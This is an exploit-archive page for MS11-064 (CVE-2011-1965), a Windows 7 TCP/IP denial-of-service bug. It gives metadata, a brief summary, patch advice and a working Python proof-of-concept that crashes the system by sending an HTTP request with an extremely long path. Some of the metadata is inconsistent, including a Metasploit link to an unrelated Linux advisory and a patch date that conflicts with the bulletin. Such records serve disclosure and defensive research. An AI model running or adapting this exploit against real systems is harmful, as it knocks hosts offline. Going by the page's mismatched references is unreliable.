MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service

vendor:

Windows 7

by:

Byoungyoung Lee

7.8

CVSS

HIGH

Denial of Service

CWE

Product Name: Windows 7

Affected Version From: Windows 7 32bit

Affected Version To: Windows 7 32bit

Patch Exists: Yes

Related CWE: CVE-2011-1965

CPE: o:microsoft:windows_7::-:32bit

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1088/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 32bit

2011

MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service

Byoungyoung Lee developed an exploit for Windows 7 32bit, fully patched until Aug 2011, which could allow a denial of service attack. The exploit uses a combination of a long filename and a short filename to cause a kernel panic. The exploit is available at http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/

Mitigation:

Microsoft released a patch for this vulnerability in October 2011. It is recommended to install the patch as soon as possible.

Source

Exploit-DB raw data:

# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965

# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/

------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket

HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80

def tryOnce(i,j):
    print hex(i), hex(j)
    filename = ["a"*0x100 for x in range(i)]

    filename = "/".join(filename)
    filename += "/" + "b" * j
    print "filename len : ", hex(len(filename))

    hostname = "www.darungrim.org"

    header = "GET /%s\n" % filename
    header += "HOST: %s\n\n\n" % hostname

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST,PORT))
    s.send(header)
    response = s.recv(1024)
    s.close()
    print response
    return

if __name__ == '__main__':
    tryOnce(0x3c,0x7)